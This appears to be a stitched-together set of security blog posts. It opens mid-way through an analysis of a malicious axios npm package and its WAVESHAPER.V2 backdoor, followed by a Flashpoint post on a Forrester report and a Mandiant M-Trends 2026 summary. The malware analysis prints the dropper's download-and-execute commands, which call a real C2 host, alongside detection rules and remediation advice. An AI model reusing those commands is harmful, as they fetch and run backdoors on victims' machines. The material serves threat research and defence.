The dropper actively hunts for the native powershell.exe binary. To evade detection, it copies the legitimate executable to %PROGRAMDATA%\wt.exe. It then downloads a PowerShell script via curl using the POST body packages.npm.org/product1 and saves it to the user's AppData Temp directory (e.g., %TEMP%\6202033.ps1). The payload is executed using a copied Windows Terminal executable with hidden and execution policy bypass flags.
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%\6202033.ps1
& %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 http://sfrclak[.]com:8000/6202033 & del ""PS_PATH"" /f", 0, FalsemacOS
The malware uses bash and curl to download a native Mach-O binary payload to /Library/Caches/com.apple.act.mond using the POST body packages.npm.org/product0. It modifies permissions to make the file executable and launches it via zsh in the background.
try
do shell script "
curl -o /Library/Caches/com.apple.act.mond
-d packages.npm.org/product0
-s http://sfrclak.com:8000/6202033
&& chmod 770 /Library/Caches/com.apple.act.mond
&& /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"
&> /dev/null"
"
end try
do shell script "rm -rf tmp/6202033"Linux
The script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2.
Cleanup
Aside from removing downloaded scripts in two execution branches, the script attempts to remove itself and replace an injected package.json with an original one, which was stored as "package.md".
const K = __filename;
t.unlink(K, (x => {}))
t.unlink('package.json', (x => {})), t.rename('package.md', 'package.json', ord)WAVESHAPER.V2 Backdoor Capabilities
The platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2, a backdoor written in C++ that targets macOS to collect system information, enumerate directories, or execute additional payloads and that connects to the C2 provided via command-line arguments. Notably, GTIG identified additional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments. Regardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second intervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent:
mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)
Following the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing for 60 seconds awaiting instructions. The server response determines the next action taken by the implant. The backdoor supports multiple commands outlined in the Table 1.
|
Command |
Description |
|---|---|
|
|
Terminates the malware's execution process. |
|
|
Retrieves detailed directory listings, including file paths, sizes, and creation/modification timestamps for paths specified in the |
|
|
Decodes and executes a provided AppleScript payload. |
|
|
Decodes, drops, ad-hoc signs, and executes an arbitrary binary payload with optional parameters. |
On Windows, persistence is achieved by creating a hidden batch file (%PROGRAMDATA%\system.bat) and adding a new entry named MicrosoftUpdate to HKCU:\Software\Microsoft\Windows\CurrentVersion\Run to launch it at logon.
WAVESHAPER.V2 acts as a fully functional RAT with the following capabilities:
-
Reconnaissance: Extracts system telemetry, including hostname, username, boot time, time zone, OS version, and detailed running process lists.
-
Command Execution: Supports multiple execution methods, including in-memory Portable Executable (PE) injection and arbitrary shell commands. The shell execution command expects a script and script parameters from C2; if no script is provided, the parameter is executed as a PowerShell command, but if a script is provided, it is either Base64-encoded or placed into a file depending on its size.
-
File System Enumeration: Returns detailed metadata for requested target directories by continuously recursing through the file system.
Attribution
GTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since 2018. Analysis of the C2 infrastructure (sfrclak[.]com resolving to 142.11.206.73) revealed connections from a specific AstrillVPN node previously used by UNC1069. Additionally, adjacent infrastructure hosted on the same ASN has been historically linked to UNC1069 operations.
Furthermore, WAVESHAPER.V2 is a direct evolution of WAVESHAPER, a macOS and Linux backdoor previously attributed to UNC1069. While the original WAVESHAPER uses a lightweight, raw binary C2 protocol and employs code packing, WAVESHAPER.V2 communicates using JSON, collects additional system information, and supports more backdoor commands. Despite these upgrades, both versions accept their C2 URL dynamically via command-line arguments, share identical C2 polling behaviors and an uncommon User-Agent string, and deploy secondary payloads to identical temporary directories (e.g., /Library/Caches/com.apple.act.mond).
Outlook and Implications
The impact of this attack by North Korea-nexus actors is broad and has ripple effects as other popular packages rely on axios as a dependency. Notably, UNC1069 isn’t the only threat actor that has launched successful open source supply chain attacks in recent weeks. UNC6780 (also known as TeamPCP) recently poisoned GitHub Actions and PyPI packages associated with projects like Trivy, Checkmarx, and LiteLLM to deploy the SANDCLOCK credential stealer and facilitate follow-on extortion operations.
Hundreds of thousands of stolen secrets could potentially be circulating as a result of these recent attacks. This could enable further software supply chain attacks, software as a service (SaaS) environment compromises (leading to downstream customer compromises), ransomware and extortion events, and cryptocurrency theft over the near term.
Supply chain compromise is a particularly dangerous tactic because it abuses the inherent trust that users and enterprise administrators place in hardware, software, and updates supplied by reputable vendors as well as the trust they may not realize they are placing in collaborative code-sharing communities. Defenders should pay close attention to these campaigns, and enterprises should initiate dedicated efforts to assess the existing impact, remediate compromised systems, and harden environments against future attacks.
Remediation
GTIG urges all developers and organizations using the axios package to take immediate corrective action. Priority should be given to auditing dependency trees for compromised versions, isolating affected hosts, and rotating any potentially exposed secrets or credentials. Following initial containment, organizations must implement long-term hardening through strict version pinning and enhanced supply-chain monitoring.
-
Version Control: Do not upgrade to axios version 1.14.1 or 0.30.4. Ensure corporate-managed NPM repositories are configured to serve only known-good versions (e.g., 1.14.0 or earlier; 0.30.3 or earlier).
-
Dependency Pinning: Pin axios to a known safe version in your
package-lock.jsonto prevent accidental upgrades. -
Malicious Package Audit: Inspect project lockfiles specifically for the 'plain-crypto-js' package (versions 4.2.0 or 4.2.1). Use tools like Wiz or Open Source Insights for deeper dependency auditing.
-
Pipeline Security: Pause CI/CD deployments for any package relying on axios. Validate that builds are not pulling "latest" versions before redeploying with pinned, safe versions.
-
Incident Response: If
plain-crypto-jsis detected, assume the host environment is compromised. Revert the environment to a known-good state and rotate all credentials or secrets present on that machine. -
Network Defense: Block all traffic to sfrclak[.]com and the command & control IP: 142.11.206.73. Monitor and alert on any endpoint communication attempts to this domain.
-
Cache Remediation: Clear local and shared npm, yarn, and pnpm caches on all workstations and build servers to prevent re-infection during subsequent installs.
-
Endpoint Protection: Deploy EDR to protect developer environments. Monitor for suspicious processes spawning from Node.js applications that match known Indicators of Compromise (IOCs).
-
Credential Management: Rotate all tokens and API keys used by applications confirmed to have run indicators of compromise (IOCs).
- Developer Sandboxing & Secret Vaulting: Isolate development environments in containers or sandboxes to restrict host filesystem access, and migrate plaintext secrets to the OS keychain using aws-vault. This ensures compromised packages cannot programmatically scrape credentials or execute malicious scripts directly on the host machine.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying the activity outlined in this blog post, we have included IOCs in a free GTI Collection for registered users.
Network Indicators
|
Indicator |
Type |
Notes |
|
|
C2 |
WAVESHAPER.V2 |
|
|
C2 |
WAVESHAPER.V2 |
|
|
C2 |
WAVESHAPER.V2 |
|
|
C2 |
WAVESHAPER.V2 |
|
|
C2 |
Suspected UNC1069 Infrastructure |
File Indicators
|
Family |
Notes |
SHA256 |
|
WAVESHAPER.V2 |
Linux Python RAT |
|
|
WAVESHAPER.V2 |
macOS Native Binary |
|
|
WAVESHAPER.V2 |
Windows Stage 1 |
|
|
WAVESHAPER.V2 |
N/A |
|
|
SILKBELL |
N/A |
|
|
N/A |
system.bat |
|
|
N/A |
plain-crypto-js-4.2.1.tgz |
|
YARA Rules
These rules may be most useful on developer workstations, CI/build systems, and other suspected impacted hosts for retrospective hunting and validation.
rule G_Backdoor_WAVESHAPER.V2_PS_1
{
meta:
description = "Detects the WAVESHAPER.V2 PowerShell backdoor which communicates with C2 via base64 encoded JSON beacons and supports PE injection and script execution"
author = "GTIG"
md5 = "04e3073b3cd5c5bfcde6f575ecf6e8c1"
date_created = "2026/03/31"
date_modified = "2026/03/31"
rev = 1
platforms = "Windows"
family = "WAVESHAPER.V2"
strings:
$ss1 = "packages.npm.org/product1" ascii wide nocase
$ss2 = "Extension.SubRoutine" ascii wide nocase
$ss3 = "rsp_peinject" ascii wide nocase
$ss4 = "rsp_runscript" ascii wide nocase
$ss5 = "rsp_rundir" ascii wide nocase
$ss6 = "Init-Dir-Info" ascii wide nocase
$ss7 = "Do-Action-Ijt" ascii wide nocase
$ss8 = "Do-Action-Scpt" ascii wide nocase
condition:
uint16(0) != 0x5A4D and filesize < 100KB and 5 of ($ss*)
}rule G_Hunting_Downloader_suspected_UNC1069_PS_1
{
meta:
description = "Detects PowerShell dropper associated with suspected UNC1069 and Axios npm package supply chain attack. Associated to WAVESHAPER.V2"
author = "GTIG"
md5 = "089e2872016f75a5223b5e02c184dfec"
date_created = "2026/03/31"
date_modified = "2026/03/31"
rev = 1
platforms = "Windows"
strings:
$ss1 = "start /min powershell -w h" ascii wide nocase
$ss2 = "[scriptblock]::Create([System.Text.Encoding]::UTF8.GetString" ascii wide nocase
$ss3 = "Invoke-WebRequest -UseBasicParsing" ascii wide nocase
$ss4 = "-Method POST -Body" ascii wide nocase
$ss5 = "packages.npm.org/product1" ascii wide nocase
condition:
uint16(0) != 0x5A4D and filesize < 5KB and all of them
}rule G_Hunting_Downloader_SILKBELL_1
{
meta:
description = "Detects the obfuscated version of the JS NPM supply chain downloader using Base64 obfuscation and custom XOR. Associated with WAVESHAPER.V2"
author = "GTIG"
md5 = "7658962ae060a222c0058cd4e979bfa1"
date_created = "2026/03/31"
date_modified = "2026/03/31"
rev = 1
platforms = "Any"
strings:
$ss1 = "OrDeR_7077" ascii wide fullword
$ss2 = "String.fromCharCode(S^a^333)" ascii wide
$ss3 = "\"TE9DQUw^\".replaceAll(\"^\",\"=\")" ascii wide
$ss4 = "\"UFM_\".replaceAll(\"_\",\"=\")" ascii wide
$ss5 = "\"U0NSXw--\".replaceAll(\"-\",\"=\")" ascii wide
$ss6 = "\"UFNfQg--\".replaceAll(\"-\",\"=\")" ascii wide
$ss7 = "\"d2hlcmUgcG93ZXJzaGVsbA((\".replaceAll(\"(\",\"=\")" ascii wide
condition:
uint16(0) != 0x5A4D and filesize < 100KB and all of them
}Google Security Operations (SecOps)
Google Security Operations (SecOps) customers have access to the following broad category rules and more under the Mandiant Intel Emerging Threats rule pack.
-
Curl Writing Apple System File to Staging Directory
-
Node Spawning Nohup Osascript
-
Node Spawning Windows Script Host With Delete Command
-
Windows Script Host Spawning Shell With Curl
-
Windows Terminal In Suspicious Staging Directory
Wiz
Wiz customers should check their Wiz Threat Center for information on this advisory and whether or not they are impacted. For more information refer to Wiz’s blog post, Axios NPM Distribution Compromised in Supply Chain Attack.
Forrester Threat Intelligence Landscape: Key Takeaways for Security Leaders
Blog
Forrester Threat Intelligence Landscape: Key Takeaways for Security Leaders
Key insights from Forrester’s External Threat Intelligence Service Providers Landscape, Q1 2026 and what they mean for security teams.

Forrester recently published The External Threat Intelligence Service Providers Landscape, Q1 2026, an overview of 34 vendors in the external threat intelligence market — defining market maturity and outlining key dynamics and use cases.
For security and risk leaders, the report offers a clear picture of how the market is evolving and where organizations should focus as they evaluate and operationalize threat intelligence.
The Market Has Moved Beyond Undifferentiated Data Collection
One of the clearest takeaways from the report is how significantly the market has matured.
Threat intelligence is no longer simply about collecting indicators or monitoring feeds. The expectation is now:
- Contextualized analysis
- Relevance to specific business risks
- Direct applicability to detection, response, and decision-making
In our experience, turning data into action is among the most pressing challenges for security leaders. At RSA Conference 2026, Flashpoint introduced new capabilities designed to address this gap by connecting adversary activity directly to business priorities, assets, and investigations.
Intelligence Is Only Valuable When It’s Operationalized
The report also calls out a central challenge: gaps in operationalizing intelligence and aligning it to business context.
Forrester notes, “Gaps in operationalizing intelligence and aligning it to business context are the primary challenge in this market. As the industry shifts from static IOCs to TTPs, scaling operational use becomes difficult when intelligence is not tightly integrated into existing detection, response, and investigation workflows.”
This reflects what we consistently see across teams:
- Intelligence exists, but sits outside workflows
- Insights don’t map cleanly to assets, users, or priorities
- Teams spend time interpreting instead of acting
This alignment of collection and operationalization is defining the next phase of the market.
AI Is Accelerating, But Not Replacing, Intelligence Workflows
Another key theme is the role of AI.
The Forrester report points out, “The main trend in this market is agentic AI being embedded into threat intelligence workflows to improve effectiveness and efficiency… While AI is reshaping the threat intelligence industry, human expertise remains essential to interpret intelligence, apply it to an organization’s unique risk profile, and design, validate, govern, and maintain even highly automated systems over time.”
This balance is critical.
AI is improving how teams operate day to day. Our customers largely credit AI for optimizing:
- Correlation across disparate signals
- Speed of triage and enrichment
- Detection engineering and threat hunting
At the same time, customers do not believe that it can replace:
- Contextual understanding of adversaries
- Business-specific risk interpretation
- Decision-making under uncertainty
Security teams that treat AI as a force multiplier tend to see the most impact. We explore this further in our recent work on AI and threat intelligence.
Where Flashpoint Fits Into The Threat Intelligence Landscape
In The External Threat Intelligence Service Providers Landscape, Q1 2026, Flashpoint self-reported the extended use cases of fraud, financial abuse, counterfeiting, and piracy, threats targeting physical assets, and vulnerability and exposure prioritization as the top three use cases for which clients select them.
From our perspective, the direction outlined in the report closely aligns with how we see the market evolving. Flashpoint is designed to operationalize the capabilities described in the report by linking adversary activity to business context, assets, and decision-making workflows.
From our experience as the largest private provider of threat intelligence, effective threat intelligence today requires:
- Primary source collection at scale: Direct access to adversary communications, illicit marketplaces, and closed communities — not just aggregated feeds
- Contextualized, finished intelligence: Analysis that connects activity to real-world impact across assets, people, and operations
- Operational integration: Intelligence that maps directly into workflows and investigations
- Cross-domain visibility: Coverage that spans cyber, physical, and geopolitical risk — not treating them as separate problems
What Security Leaders Should Take Away
Based on our experience working with security teams, we see a few consistent priorities for those evaluating threat intelligence providers:
- Prioritize outcomes over inputs: The volume of data matters less than its relevance and usability
- Look for operational alignment: Intelligence should integrate into detection, response, and investigation workflows
- Evaluate context, not just coverage: Breadth of collection matters — but depth of analysis is what drives decisions
- Plan for convergence: Cyber, physical, and brand risks are increasingly interconnected
- Treat AI as an accelerator, not a replacement: Automation improves scale, but expertise drives impact
Final Thoughts
We believe Forrester’s overview reflects a market that is maturing quickly, but highlights the continued need for security teams to focus on turning intelligence into action.
For organizations evaluating providers, the question is not solely “Who has the most data?”
Organizations must also consider “Where does that data come from, and who can help us make better decisions, faster and with confidence?”
To see how Flashpoint supports this in practice, schedule a demo.
Required Disclaimer
Forrester does not endorse any company, product, brand, or service included in its research publications and does not advise any person to select the products or services of any company or brand based on the ratings included in such publications. Information is based on the best available resources. Opinions reflect judgment at the time and are subject to change. For more information, read about Forrester’s objectivity here.
Begin your free trial today.
The post Forrester Threat Intelligence Landscape: Key Takeaways for Security Leaders appeared first on Flashpoint.
Scarlet Goldfinch’s year in ClickFix
M-Trends 2026: Data, Insights, and Strategies From the Frontlines
Every year, the cyber threat landscape forces defenders to adapt to evolving adversary tactics, techniques, and procedures (TTPs). In 2025, Mandiant observed a clear divergence in adversary pacing that closely aligns with the trends we have been documenting for defenders over the past year. On one end of the spectrum, cyber criminal groups optimized for immediate impact and deliberate recovery denial. On the other end, sophisticated cyber espionage groups and insider threats optimized for extreme persistence, utilizing unmonitored edge devices and native network functionalities to evade detection.
Today, we release M-Trends 2026. Grounded in over 500,000 hours of frontline incident investigations conducted by Mandiant globally in 2025, this report provides a definitive look at the TTPs actively being used in breaches today.
- aside_block
- <ListValue: [StructValue([('title', 'M-Trends 2026 is available!'), ('body', <wagtail.rich_text.RichText object at 0x7f65bbb34940>), ('btn_text', 'Download now'), ('href', 'https://cloud.google.com/security/resources/m-trends?utm_source=cgc-blog&utm_medium=blog&utm_campaign=FY26-Q1-GLOBAL-STO89-website-dl-dgcsm-mtrends26-162712&utm_content=-&utm_term=-'), ('image', <GAEImage: m-trends blog callout>)])]>
By the Numbers: M-Trends 2026
The metrics in this year's report highlight how adversaries are shifting their approaches to bypass modern security controls:
-
Global Median Dwell Time: Global median dwell time rose to 14 days from 11 days. This shift likely reflects growing sophistication, particularly in evading defenses. When looking specifically at the high quantity of cyber espionage and North Korean IT worker incidents, the median dwell time for both categories was 122 days.
-
Initial Infection Vectors: Exploits remained the most common initial infection vector for the sixth consecutive year, accounting for 32% of intrusions. However, highly interactive voice phishing saw a significant surge to 11%, becoming the second-most commonly observed vector.
-
Detection by Source: Organizations are improving their internal visibility. Across all 2025 investigations, 52% of the time organizations first detected evidence of malicious activity internally, an increase from 43% in 2024.
-
Targeted Industries: The full scope of incidents affected more than 16 industry verticals, with the high tech sector (17%) outpacing the financial sector (14.6%) as the most frequently targeted industry, shifting the financial sector out of the top spot it held in 2024 and 2023.
The Collapse of the "Hand-Off" Window
One of the most notable trends we observed in 2025 is the increased specialization and collaboration within the cyber crime ecosystem. Initial access partners are using low-impact techniques, such as malicious advertisements or the ClickFix social engineering technique, to gain a foothold. They then hand off this access to secondary groups who execute high-impact operations like ransomware.
In 2022, the median time between an initial access event and the hand-off to a secondary threat group was more than 8 hours. In 2025, that window collapsed to just 22 seconds. Initial access partners are increasingly pre-staging the secondary group's preferred malware or tunnels during the initial infection, meaning secondary actors are fully equipped to launch operations the moment they first interact with the network.
This pattern is reflected in how attackers are breaching organizations. We found that prior compromise ranked as the third-most common initial infection vector (10%) for intrusions globally, and the top initial infection vector in ransomware operations (30%), doubling what it was in 2024 (15%).
Voice Phishing and the SaaS Identity Crisis
Historically, email phishing has been an adversary staple. But as automated technical controls have improved, email phishing dropped to just 6% of intrusions in 2025. In its place, adversaries have pivoted to highly interactive, voice-based social engineering.
We have extensively documented this progression in blog posts and reports, notably tracking how groups like UNC3944 target IT help desks to bypass multifactor authentication (MFA) and gain initial access to software-as-a-service (SaaS) environments (see: Vishing for Access: Tracking the Expansion of ShinyHunters-Branded SaaS Data Theft).
M-Trends 2026 reveals the cascading impact of these techniques. Threat actors are bypassing standard defenses by harvesting long-lived OAuth tokens and session cookies. By compromising third-party SaaS vendors, attackers steal hard-coded keys and personal access tokens, using those secrets to seamlessly pivot into downstream customer environments to execute large-scale data theft.
Ransomware Evolves into Recovery Denial
Ransomware groups are no longer just encrypting data; they are actively destroying the ability to recover. In 2025, we observed a systemic shift where ransomware operators, including prolific groups using REDBIKE (Akira) and AGENDA (Qilin), actively targeted backup infrastructure, identity services, and virtualization management planes.
Attackers are exploiting misconfigured Active Directory Certificate Services templates to create admin accounts that bypass password rotation and are actively deleting backup objects from cloud storage. Furthermore, attackers are exploiting the "Tier-0" nature of hypervisors to bypass guest-level defenses. By targeting the virtualization storage layer directly or encrypting hypervisor datastores, they can render all associated virtual machines inoperable simultaneously.
This directly aligns with the complex intrusions we outlined in our guide, From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944. Modern ransomware is now a fundamental resilience problem, forcing organizations into a choice: pay or rebuild.
Edge Devices, Zero-Days, and Extreme Persistence
While cyber criminals optimize for speed, espionage groups are optimizing for extreme persistence. Threat clusters like UNC6201 and UNC5807 deliberately target edge and core network devices, such as virtual private networks (VPNs) and routers, that typically lack standard endpoint detection and response (EDR) telemetry. M-Trends 2026 reveals that the mean time to exploit vulnerabilities dropped to an estimated -7 days, meaning exploitation is routinely occurring before a patch is even released. This acceleration underscores the severity of the trends and campaigns we have recently documented, from increasing zero-day usage over 2024 (as reported on in Look at What You Made Us Patch: 2025 Zero-Days in Review2025 Zero-Days in Review) to our analysis of UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day. By leveraging native packet-capturing functionality on these devices, adversaries can directly intercept sensitive data and plaintext credentials as they transit the network, allowing them to gather intelligence without ever needing to move deeper into traditional sources like workstations or servers.
Attackers are deploying custom, in-memory malware like the BRICKSTORM backdoor directly onto these network appliances to establish deep persistence that routinely survives standard remediation efforts and system reboots. Because these devices are designed with minimal onboard storage and cannot support traditional security tooling, conducting file system or memory forensics presents a significant challenge, often leaving security teams with limited artifacts to confirm an attacker's presence or properly scope the remediation. Furthermore, this extreme persistence creates a critical visibility gap. With threats like BRICKSTORM achieving dwell times of nearly 400 days, standard 90-day log retention policies leave organizations completely blind to the initial access vector and the full scope of the intrusion.
AI Threat Landscape
A comprehensive overview of the 2025 threat landscape requires addressing adversary use of artificial intelligence (AI). Ongoing Google Threat Intelligence Group research reveals that adversaries are integrating AI to accelerate the attack lifecycle. We have seen malware families like PROMPTFLUX and PROMPTSTEAL actively query large language models (LLMs) mid-execution to evade detection, while "distillation attacks" threaten intellectual property by extracting the proprietary logic and specialized training data of high-value machine learning models. M-Trends 2026 confirms attackers are abusing AI within compromised environments. For example, the QUIETVAULT credential stealer was observed checking targeted machines for local AI command-line tools, executing predefined prompts to search for configuration files.
Despite these rapid technological advancements, we do not consider 2025 to be the year where breaches were the direct result of AI. From our view on the frontlines, the vast majority of successful intrusions still stem from fundamental human and systemic failures. However, to ensure organizations are prepared as AI-powered capabilities evolve, Mandiant red teams are actively incorporating AI-driven techniques into engagements—such as prompt injection—to rigorously test defenses against emerging threats. By highlighting the unique risks surrounding AI implementations, such as the abuse of developer toolchains, we help organizations establish behavioral baselines and adopt principles from the Google Secure AI Framework (SAIF). Beyond securing the AI models themselves, we also help organizations leverage AI-powered defense as a force multiplier for security operations. For a deeper dive into AI and security, read our recently published paper, AI risk and resilience: A Mandiant special report.
Recommendations for Defenders
To build true operational resilience and outmaneuver modern adversaries, organizations must move at the speed of the attacker. M-Trends 2026 provides extensive, actionable guidance, including:
-
Treat Low-Impact Alerts as Critical Indicators: With hand-off times shrinking to seconds, security teams must restructure response playbooks. Treat routine malware alerts as high-priority indicators of an impending secondary intrusion, and remediate before interactive hands-on-keyboard operations begin.
-
Isolate Critical Control Planes: Virtualization and management platforms must be treated as Tier-0 assets with the strictest access constraints. To counter the destruction of recovery capabilities, backup environments should be decoupled from the corporate Active Directory domain and utilize immutable storage (to defend against these attacks, review our guide, Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition).
-
Shift to Continuous Identity Verification: Because interactive social engineering frequently bypasses traditional MFA, organizations must enforce strict least privilege, regularly audit SaaS integrations, and route all SaaS applications through a central identity provider (IdP).
-
Transition from Static IOCs to Behavioral Anomaly Detection: With attackers rapidly changing infrastructure and deploying custom, in-memory malware, relying solely on static indicators of compromise (IOCs) is no longer sufficient. Defenders must implement behavior-based detection models that flag anomalous activity and deviations from established baselines, specifically concerning unauthorized access to edge devices, anomalous bulk API operations, or the suspicious use of SaaS integration tokens.
-
Expand Visibility and Extend Log Retention: Deploy advanced threat detection across the entire ecosystem. To close the visibility gap associated with multi-year intrusions, organizations must extend log retention policies well beyond standard 90-day windows. Forward critical network device logs—especially application and administrative logs—and hypervisor-level telemetry to centralized, long-term storage to eliminate the blind spots sophisticated actors rely upon.
Be Ready to Respond
The Mandiant mission is to help keep every organization secure from cyber threats and confident in their readiness. For 17 years, our annual M-Trends report has been a core component of advancing that mission, sharing frontline knowledge to help defenders close critical visibility gaps.
To learn about the cyber threat landscape, and how we recommend organizations adapt to its ongoing changes, explore our M-Trends 2026 resources:
-
Download the M-Trends 2026 report for a comprehensive dive into our frontline data.
-
Read the M-Trends 2026 Executive Edition for a high-level look at the data and trends, along with key recommendations.
-
Register for our upcoming M-Trends 2026 webinar—the first in a planned series—for an in-depth look at the data, topics, and recommendations discussed in the report.
-
Listen to a special episode of the Google Cloud Security Podcast featuring M-Trends 2026 to learn more about what the findings mean and how the report is created.
